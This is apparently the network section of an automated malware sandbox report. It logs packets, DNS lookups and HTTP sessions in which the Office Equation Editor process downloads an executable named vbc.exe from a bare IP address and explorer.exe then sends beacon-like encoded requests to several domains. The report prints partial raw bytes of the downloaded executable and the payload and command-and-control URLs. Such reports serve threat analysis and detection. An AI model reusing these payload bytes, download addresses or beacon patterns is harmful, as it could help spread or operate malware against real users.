                                              Sep 15, 2021 11:41:58.960050106 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.960056067 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.960081100 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.960081100 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.960103989 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.960119963 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.960125923 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.960131884 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.960153103 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.960158110 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.960176945 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.960184097 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.960205078 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.960208893 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.960232973 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.960232973 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.960253000 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.960258007 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.960273981 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.960284948 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.960300922 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.960308075 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.960324049 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.960335970 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.960351944 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.960362911 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.960378885 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.960386992 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.960402012 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.960412979 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.960432053 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.960437059 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.960453987 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.960459948 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.960479975 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.960484982 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.960503101 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.960508108 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.960529089 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.960536003 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.960552931 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.960573912 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.962963104 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.972932100 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.972978115 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.973001957 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.973021030 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.973040104 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.973059893 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.973082066 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.973104000 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.973104000 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.973138094 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.973150015 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.973223925 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.973244905 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.973263025 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.973284006 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.973345041 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.973361969 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.973730087 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:59.543520927 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:43:22.721012115 CEST4916680192.168.2.22144.217.61.66
                                              Sep 15, 2021 11:43:22.831593037 CEST8049166144.217.61.66192.168.2.22
                                              Sep 15, 2021 11:43:22.831841946 CEST4916680192.168.2.22144.217.61.66
                                              Sep 15, 2021 11:43:22.833062887 CEST4916680192.168.2.22144.217.61.66
                                              Sep 15, 2021 11:43:22.944506884 CEST8049166144.217.61.66192.168.2.22
                                              Sep 15, 2021 11:43:23.548243999 CEST8049166144.217.61.66192.168.2.22
                                              Sep 15, 2021 11:43:23.548284054 CEST8049166144.217.61.66192.168.2.22
                                              Sep 15, 2021 11:43:23.548643112 CEST4916680192.168.2.22144.217.61.66
                                              Sep 15, 2021 11:43:23.548790932 CEST4916680192.168.2.22144.217.61.66
                                              Sep 15, 2021 11:43:23.659280062 CEST8049166144.217.61.66192.168.2.22
                                              Sep 15, 2021 11:43:28.640290022 CEST4916780192.168.2.2234.102.136.180
                                              Sep 15, 2021 11:43:28.657324076 CEST804916734.102.136.180192.168.2.22
                                              Sep 15, 2021 11:43:28.657450914 CEST4916780192.168.2.2234.102.136.180
                                              Sep 15, 2021 11:43:28.657859087 CEST4916780192.168.2.2234.102.136.180
                                              Sep 15, 2021 11:43:28.674726009 CEST804916734.102.136.180192.168.2.22
                                              Sep 15, 2021 11:43:28.772924900 CEST804916734.102.136.180192.168.2.22
                                              Sep 15, 2021 11:43:28.772952080 CEST804916734.102.136.180192.168.2.22
                                              Sep 15, 2021 11:43:28.773220062 CEST4916780192.168.2.2234.102.136.180
                                              Sep 15, 2021 11:43:28.796184063 CEST4916780192.168.2.2234.102.136.180
                                              Sep 15, 2021 11:43:28.815479040 CEST804916734.102.136.180192.168.2.22
                                              Sep 15, 2021 11:43:33.888875008 CEST4916880192.168.2.2275.2.89.208
                                              Sep 15, 2021 11:43:33.907452106 CEST804916875.2.89.208192.168.2.22
                                              Sep 15, 2021 11:43:33.907576084 CEST4916880192.168.2.2275.2.89.208
                                              Sep 15, 2021 11:43:33.907896996 CEST4916880192.168.2.2275.2.89.208
                                              Sep 15, 2021 11:43:33.926316977 CEST804916875.2.89.208192.168.2.22
                                              Sep 15, 2021 11:43:34.201092958 CEST804916875.2.89.208192.168.2.22
                                              Sep 15, 2021 11:43:34.201121092 CEST804916875.2.89.208192.168.2.22
                                              Sep 15, 2021 11:43:34.201534986 CEST4916880192.168.2.2275.2.89.208
                                              Sep 15, 2021 11:43:34.201668024 CEST4916880192.168.2.2275.2.89.208
                                              Sep 15, 2021 11:43:34.220087051 CEST804916875.2.89.208192.168.2.22
                                              Sep 15, 2021 11:43:39.259735107 CEST4916980192.168.2.2234.98.99.30
                                              Sep 15, 2021 11:43:39.278673887 CEST804916934.98.99.30192.168.2.22
                                              Sep 15, 2021 11:43:39.278789997 CEST4916980192.168.2.2234.98.99.30
                                              Sep 15, 2021 11:43:39.279041052 CEST4916980192.168.2.2234.98.99.30
                                              Sep 15, 2021 11:43:39.297933102 CEST804916934.98.99.30192.168.2.22
                                              Sep 15, 2021 11:43:39.395982027 CEST804916934.98.99.30192.168.2.22
                                              Sep 15, 2021 11:43:39.396030903 CEST804916934.98.99.30192.168.2.22
                                              Sep 15, 2021 11:43:39.396260023 CEST4916980192.168.2.2234.98.99.30
                                              Sep 15, 2021 11:43:39.396364927 CEST4916980192.168.2.2234.98.99.30
                                              Sep 15, 2021 11:43:39.706437111 CEST4916980192.168.2.2234.98.99.30
                                              Sep 15, 2021 11:43:39.727917910 CEST804916934.98.99.30192.168.2.22

                                              UDP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Sep 15, 2021 11:43:17.547328949 CEST5216753192.168.2.228.8.8.8
                                              Sep 15, 2021 11:43:17.581933975 CEST53521678.8.8.8192.168.2.22
                                              Sep 15, 2021 11:43:22.596507072 CEST5059153192.168.2.228.8.8.8
                                              Sep 15, 2021 11:43:22.714829922 CEST53505918.8.8.8192.168.2.22
                                              Sep 15, 2021 11:43:28.594424963 CEST5780553192.168.2.228.8.8.8
                                              Sep 15, 2021 11:43:28.637029886 CEST53578058.8.8.8192.168.2.22
                                              Sep 15, 2021 11:43:33.835074902 CEST5903053192.168.2.228.8.8.8
                                              Sep 15, 2021 11:43:33.886842012 CEST53590308.8.8.8192.168.2.22
                                              Sep 15, 2021 11:43:39.212805986 CEST5918553192.168.2.228.8.8.8
                                              Sep 15, 2021 11:43:39.257781982 CEST53591858.8.8.8192.168.2.22

                                              DNS Queries

                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                              Sep 15, 2021 11:43:17.547328949 CEST192.168.2.228.8.8.80x8eb8Standard query (0)www.hansel-design.comA (IP address)IN (0x0001)
                                              Sep 15, 2021 11:43:22.596507072 CEST192.168.2.228.8.8.80xc18cStandard query (0)www.aubergetoitrouge.comA (IP address)IN (0x0001)
                                              Sep 15, 2021 11:43:28.594424963 CEST192.168.2.228.8.8.80xfc43Standard query (0)www.corpmat.comA (IP address)IN (0x0001)
                                              Sep 15, 2021 11:43:33.835074902 CEST192.168.2.228.8.8.80x9c63Standard query (0)www.afishin.comA (IP address)IN (0x0001)
                                              Sep 15, 2021 11:43:39.212805986 CEST192.168.2.228.8.8.80x30e0Standard query (0)www.boxtobookshelf.comA (IP address)IN (0x0001)

                                              DNS Answers

                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                              Sep 15, 2021 11:43:17.581933975 CEST8.8.8.8192.168.2.220x8eb8Name error (3)www.hansel-design.comnonenoneA (IP address)IN (0x0001)
                                              Sep 15, 2021 11:43:22.714829922 CEST8.8.8.8192.168.2.220xc18cNo error (0)www.aubergetoitrouge.comaubergetoitrouge.comCNAME (Canonical name)IN (0x0001)
                                              Sep 15, 2021 11:43:22.714829922 CEST8.8.8.8192.168.2.220xc18cNo error (0)aubergetoitrouge.com144.217.61.66A (IP address)IN (0x0001)
                                              Sep 15, 2021 11:43:28.637029886 CEST8.8.8.8192.168.2.220xfc43No error (0)www.corpmat.comcorpmat.comCNAME (Canonical name)IN (0x0001)
                                              Sep 15, 2021 11:43:28.637029886 CEST8.8.8.8192.168.2.220xfc43No error (0)corpmat.com34.102.136.180A (IP address)IN (0x0001)
                                              Sep 15, 2021 11:43:33.886842012 CEST8.8.8.8192.168.2.220x9c63No error (0)www.afishin.comafishin.xshoppy.shopCNAME (Canonical name)IN (0x0001)
                                              Sep 15, 2021 11:43:33.886842012 CEST8.8.8.8192.168.2.220x9c63No error (0)afishin.xshoppy.shop75.2.89.208A (IP address)IN (0x0001)
                                              Sep 15, 2021 11:43:39.257781982 CEST8.8.8.8192.168.2.220x30e0No error (0)www.boxtobookshelf.comboxtobookshelf.comCNAME (Canonical name)IN (0x0001)
                                              Sep 15, 2021 11:43:39.257781982 CEST8.8.8.8192.168.2.220x30e0No error (0)boxtobookshelf.com34.98.99.30A (IP address)IN (0x0001)

                                              HTTP Request Dependency Graph

                                              • 198.12.84.109
                                              • www.aubergetoitrouge.com
                                              • www.corpmat.com
                                              • www.afishin.com
                                              • www.boxtobookshelf.com

                                              HTTP Packets

                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              0192.168.2.2249165198.12.84.10980C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                              TimestampkBytes transferredDirectionData
                                              Sep 15, 2021 11:41:57.402611017 CEST0OUTGET /cmd/vbc.exe HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                              Host: 198.12.84.109
                                              Connection: Keep-Alive
                                              Sep 15, 2021 11:41:57.576512098 CEST1INHTTP/1.1 200 OK
                                              Date: Wed, 15 Sep 2021 09:41:57 GMT
                                              Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.4.22
                                              Last-Modified: Wed, 15 Sep 2021 04:42:06 GMT
                                              ETag: "83800-5cc0151fdab7b"
                                              Accept-Ranges: bytes
                                              Content-Length: 538624
                                              Keep-Alive: timeout=5, max=100
                                              Connection: Keep-Alive
                                              Content-Type: application/x-msdownload
                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 85 c9 dd 9e 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 2e 08 00 00 08 00 00 00 00 00 00 6a 4d 08 00 00 20 00 00 00 60 08 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 08 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 18 4d 08 00 4f 00 00 00 00 60 08 00 f4 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 08 00 0c 00 00 00 fc 4c 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 70 2d 08 00 00 20 00 00 00 2e 08 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 f4 05 00 00 00 60 08 00 00 06 00 00 00 30 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 08 00 00 02 00 00 00 36 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4c 4d 08 00 00 00 00 00 48 00 00 00 02 00 05 00 90 3f 00 00 1c 5f 01 00 03 00 00 00 6f 00 00 06 ac 9e 01 00 50 ae 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7e 02 1f 24 7d 04 00 00 04 02 16 7d 07 00 00 04 02 16 7d 08 00 00 04 02 28 15 00 00 0a 00 00 2a b6 02 1f 24 7d 04 00 00 04 02 16 7d 07 00 00 04 02 16 7d 08 00 00 04 02 28 15 00 00 0a 00 00 02 03 7d 02 00 00 04 02 04 7d 03 00 00 04 2a 00 00 13 30 02 00 4f 00 00 00 00 00 00 00 02 1f 24 7d 04 00 00 04 02 16 7d 07 00 00 04 02 16 7d 08 00 00 04 02 28 15 00 00 0a 00 00 02 03 7b 01 00 00 04 7d 01 00 00 04 02 03 7b 05 00 00 04 7d 05 00 00 04 02 03 7b 06 00 00 04 7d 06 00 00 04 02 03 7b 07 00 00 04 7d 07 00 00 04 2a 3a 00 02 7b 04 00 00 04 28 16 00 00 0a 00 2a 00 00 13 30 03 00 77 00 00 00 01 00 00 11 00 03 17 52 02 7b 01 00 00 04 0b 07 0a 06 2c 66 06 72 01 00 00 70 28 17 00 00 0a 2d 29 06 72 21 00 00 70 28 17 00 00 0a 2d 25 06 72 2d 00 00 70 28 17 00 00 0a 2d 25 06 72 39 00 00 70 28 17 00 00 0a 2d 25 2b 30 02 17 7d 08 00 00 04 2b 27 04 04 4a 02 7b 07 00 00 04 58 54 2b 1a 04 04 4a 02 7b 07 00 00 04 58 54 2b 0d 04 04 4a 02 7b 07 00 00 04 58 54 2b 00 2a 00 13 30 01 00 0b 00 00 00 02 00 00 11 00 72 45 00 00 70 0a 2b 00 06 2a 00 13 30 01 00 0b 00 00 00 02 00 00 11 00 72 8b 00 00 70 0a 2b 00 06 2a 00 13 30 01 00 0c 00 00 00 03 00 00 11 00 19 8d 10 00 00 01 0a 2b 00 06 2a 22 02 28 15 00 00 0a 00 2a 00 00 00 13 30 02 00 26 00 00 00 04 00 00 11
                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL0.jM `@ @MO`L H.textp- . `.rsrc`0@@.reloc6@BLMH?_oP~$}}}(*$}}}(}}*0O$}}}({}{}{}{}*:{(*0wR{,frp(-)r!p(-%r-p(-%r9p(-%+0}+'J{XT+J{XT+J{XT+*0rEp+*0rp+*0+*"(*0&
                                              Sep 15, 2021 11:41:57.576544046 CEST3INData Raw: 00 03 16 32 12 04 16 32 0e 03 05 2f 0a 04 0e 04 fe 04 16 fe 01 2b 01 17 0a 06 2c 04 16 0b 2b 04 17 0b 2b 00 07 2a 22 02 28 15 00 00 0a 00 2a 1e 02 7b 0e 00 00 04 2a 22 02 03 7d 0e 00 00 04 2a 1e 02 7b 0f 00 00 04 2a 22 02 03 7d 0f 00 00 04 2a 00
                                              Data Ascii: 22/+,++*"(*{*"}*{*"}*0{{,X{{,X+2{{,Y+{{,Y (((*"(*Z(
                                              Sep 15, 2021 11:41:57.576561928 CEST4INData Raw: 00 02 28 39 00 00 06 16 fe 01 0b 07 2d ab 02 28 3a 00 00 06 00 2a 8a 00 28 1f 00 00 0a 00 16 28 20 00 00 0a 00 1f 0c 28 21 00 00 0a 00 72 0b 01 00 70 28 22 00 00 0a 00 2a 00 13 30 02 00 17 00 00 00 0b 00 00 11 00 02 7b 1b 00 00 04 7b 0c 00 00 04
                                              Data Ascii: (9-(:*(( (!rp("*0{{+*0K{{{{3{{{{+,{|#(**"JXT*N(rp("*0i{{{{
                                              Sep 15, 2021 11:41:57.576575994 CEST5INData Raw: 13 06 11 06 3a 9b fe ff ff 28 25 00 00 0a 00 00 06 17 58 0a 06 7e 20 00 00 04 fe 04 13 07 11 07 3a 77 fe ff ff 02 28 37 00 00 06 00 28 25 00 00 0a 00 02 28 38 00 00 06 00 2a 00 00 13 30 01 00 3a 00 00 00 04 00 00 11 00 1f 0f 28 21 00 00 0a 00 02
                                              Data Ascii: :(%X~ :w(7(%(8*0:(!(/,(!(-,(!{o?*0((!(.,(!{o@*0P{{#{{,(++%{
                                              Sep 15, 2021 11:41:57.751707077 CEST7INData Raw: 0a 00 02 7b 2d 00 00 04 17 6f 47 00 00 0a 00 02 7b 2d 00 00 04 72 27 02 00 70 6f 43 00 00 0a 00 02 7b 2d 00 00 04 17 6f 48 00 00 0a 00 02 7b 2d 00 00 04 18 6f 49 00 00 0a 00 02 7b 2d 00 00 04 20 45 02 00 00 20 f8 00 00 00 73 44 00 00 0a 6f 45 00
                                              Data Ascii: {-oG{-r'poC{-oH{-oI{- E sDoE{-oF{. @sAoB{.r=poC{.KsDoE{.oF{.rMpo:{.oJ{.OsKoL"@"PAsM
                                              Sep 15, 2021 11:41:57.751804113 CEST8INData Raw: 00 00 04 28 70 00 00 0a 6f 71 00 00 0a 00 02 22 00 00 c0 40 22 00 00 50 41 73 4d 00 00 0a 28 4e 00 00 0a 00 02 17 28 4f 00 00 0a 00 02 20 ee 00 00 00 20 23 02 00 00 73 44 00 00 0a 28 50 00 00 0a 00 02 28 51 00 00 0a 02 7b 38 00 00 04 6f 52 00 00
                                              Data Ascii: (poq"@"PAsM(N(O #sD(P(Q{8oR(Q{7oRr-p(Cr.po:fsr(sbsK(U{7ot(V*0w(ur".po7Xsvswox
                                              Sep 15, 2021 11:41:57.751828909 CEST10INData Raw: 00 06 11 10 6f 91 00 00 0a 26 2b 06 2b 04 2b 02 2b 00 00 17 13 18 38 8c fd ff ff 6a 00 28 92 00 00 0a 00 16 28 93 00 00 0a 00 73 60 00 00 06 28 94 00 00 0a 00 2a 13 30 01 00 0c 00 00 00 1e 00 00 11 00 02 7b 3b 00 00 04 0a 2b 00 06 2a 26 00 02 03
                                              Data Ascii: o&++++8j((s`(*0{;+*&};*0{<+*0T}<{?oSo:{@oWo:{>{;{9ooUoo*^}=((x**0
                                              Sep 15, 2021 11:41:57.751878023 CEST11INData Raw: 00 11 48 10 0a 00 1e 0c 4f 09 0a 00 9e 0f 48 10 06 00 77 04 ba 09 12 00 1e 12 5e 0f 12 00 65 09 5e 0f 12 00 43 11 5e 0f 06 00 0c 01 de 07 12 00 08 0f 5e 0f 06 00 df 0e 64 12 06 00 4c 01 64 12 06 00 85 12 8f 0a 0e 00 bb 07 71 08 0a 00 92 12 b4 0f
                                              Data Ascii: HOHw^e^C^^dLdqW^I^;x^lq^^^h1q^^FqeO
                                              Sep 15, 2021 11:41:57.751900911 CEST12INData Raw: 3c 0d 5f 00 0e 00 f1 22 00 00 00 00 86 18 3c 0d 06 00 10 00 fb 22 00 00 00 00 86 18 3c 0d 21 04 10 00 2a 23 00 00 00 00 86 00 e1 11 06 00 15 00 39 23 00 00 00 00 86 00 30 0b 5f 00 15 00 4a 23 00 00 00 00 86 00 c0 02 06 00 17 00 59 23 00 00 00 00
                                              Data Ascii: <_"<"<!*#9#0_J#Y#<*#####($<1$<<$1$%%
                                              Sep 15, 2021 11:41:57.751923084 CEST14INData Raw: 00 00 00 00 86 08 5b 02 62 04 49 00 84 3c 00 00 00 00 86 08 69 02 5c 04 49 00 e4 3c 00 00 00 00 86 18 3c 0d 06 00 4a 00 fc 3c 00 00 00 00 81 00 36 01 67 04 4a 00 00 3d 00 00 00 00 81 00 0b 09 67 04 4c 00 28 3d 00 00 00 00 c4 00 d7 04 15 00 4e 00
                                              Data Ascii: [bI<i\I<<J<6gJ=gL(=N`=O<OT\QOREU/(W/(gWW
                                              Sep 15, 2021 11:41:57.751945019 CEST15INData Raw: 2c 02 b9 02 3c 0d 96 01 09 01 42 08 33 02 81 02 7e 10 06 00 09 02 4e 00 57 01 81 01 3c 0d 49 02 89 01 3c 0d 06 00 c9 02 f2 0e 52 02 d1 02 49 12 58 02 d1 02 7b 00 58 02 d1 02 49 0d 5e 02 d9 02 24 09 64 02 e1 02 c1 12 6d 02 91 01 43 01 80 02 f1 02
                                              Data Ascii: ,<B3~NW<I<RIX{XI^$dmC@Qt!UI1<I1]!8*n07i<19BTHAAA)Q1]Yd<I


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              1192.168.2.2249166144.217.61.6680C:\Windows\explorer.exe
                                              TimestampkBytes transferredDirectionData
                                              Sep 15, 2021 11:43:22.833062887 CEST565OUTGET /r48a/?c6Al7=wC1czlHtHJOIwEvZ4PQX06BQ8ZOMJ62w8+xsTz2Q4T7E2YSNIqqm4eyJ4Ejs7FpYzdcNqA==&Pj=-ZPHurVh_0pD5T7 HTTP/1.1
                                              Host: www.aubergetoitrouge.com
                                              Connection: close
                                              Data Raw: 00 00 00 00 00 00 00
                                              Data Ascii:
                                              Sep 15, 2021 11:43:23.548243999 CEST566INHTTP/1.1 301 Moved Permanently
                                              Server: nginx
                                              Date: Wed, 15 Sep 2021 09:43:23 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Content-Length: 0
                                              Connection: close
                                              X-Powered-By: PHP/7.2.34
                                              Pragma: no-cache
                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                              X-Redirect-By: WordPress
                                              Set-Cookie: PHPSESSID=fifvcc2msr8fmhvo5t3hl5aru1; path=/
                                              Location: http://aubergetoitrouge.com/r48a/?c6Al7=wC1czlHtHJOIwEvZ4PQX06BQ8ZOMJ62w8+xsTz2Q4T7E2YSNIqqm4eyJ4Ejs7FpYzdcNqA==&Pj=-ZPHurVh_0pD5T7
                                              X-Powered-By: PleskLin


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              2192.168.2.224916734.102.136.18080C:\Windows\explorer.exe
                                              TimestampkBytes transferredDirectionData
                                              Sep 15, 2021 11:43:28.657859087 CEST567OUTGET /r48a/?c6Al7=2Rzi8Yj6/Bi01eAfEHjBLqabwXtDDeMENe5GOpaDyE7pCbPj3uZiRxLvQfHvYqc4eHnj6w==&Pj=-ZPHurVh_0pD5T7 HTTP/1.1
                                              Host: www.corpmat.com
                                              Connection: close
                                              Data Raw: 00 00 00 00 00 00 00
                                              Data Ascii:
                                              Sep 15, 2021 11:43:28.772924900 CEST567INHTTP/1.1 403 Forbidden
                                              Server: openresty
                                              Date: Wed, 15 Sep 2021 09:43:28 GMT
                                              Content-Type: text/html
                                              Content-Length: 275
                                              ETag: "6139efab-113"
                                              Via: 1.1 google
                                              Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              3192.168.2.224916875.2.89.20880C:\Windows\explorer.exe
                                              TimestampkBytes transferredDirectionData
                                              Sep 15, 2021 11:43:33.907896996 CEST568OUTGET /r48a/?c6Al7=LxhAJNTZvxcDVsFYS6bCkMlCl8flV20C1M37CH6Gh+RPID4ASUQUpkYPhbv5Ge3pJAOGnQ==&Pj=-ZPHurVh_0pD5T7 HTTP/1.1
                                              Host: www.afishin.com
                                              Connection: close
                                              Data Raw: 00 00 00 00 00 00 00
                                              Data Ascii:
                                              Sep 15, 2021 11:43:34.201092958 CEST569INHTTP/1.1 301 Moved Permanently
                                              Server: openresty
                                              Date: Wed, 15 Sep 2021 09:43:34 GMT
                                              Content-Type: text/html
                                              Content-Length: 166
                                              Connection: close
                                              Location: https://www.afishin.com/r48a/?c6Al7=LxhAJNTZvxcDVsFYS6bCkMlCl8flV20C1M37CH6Gh+RPID4ASUQUpkYPhbv5Ge3pJAOGnQ==&Pj=-ZPHurVh_0pD5T7
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
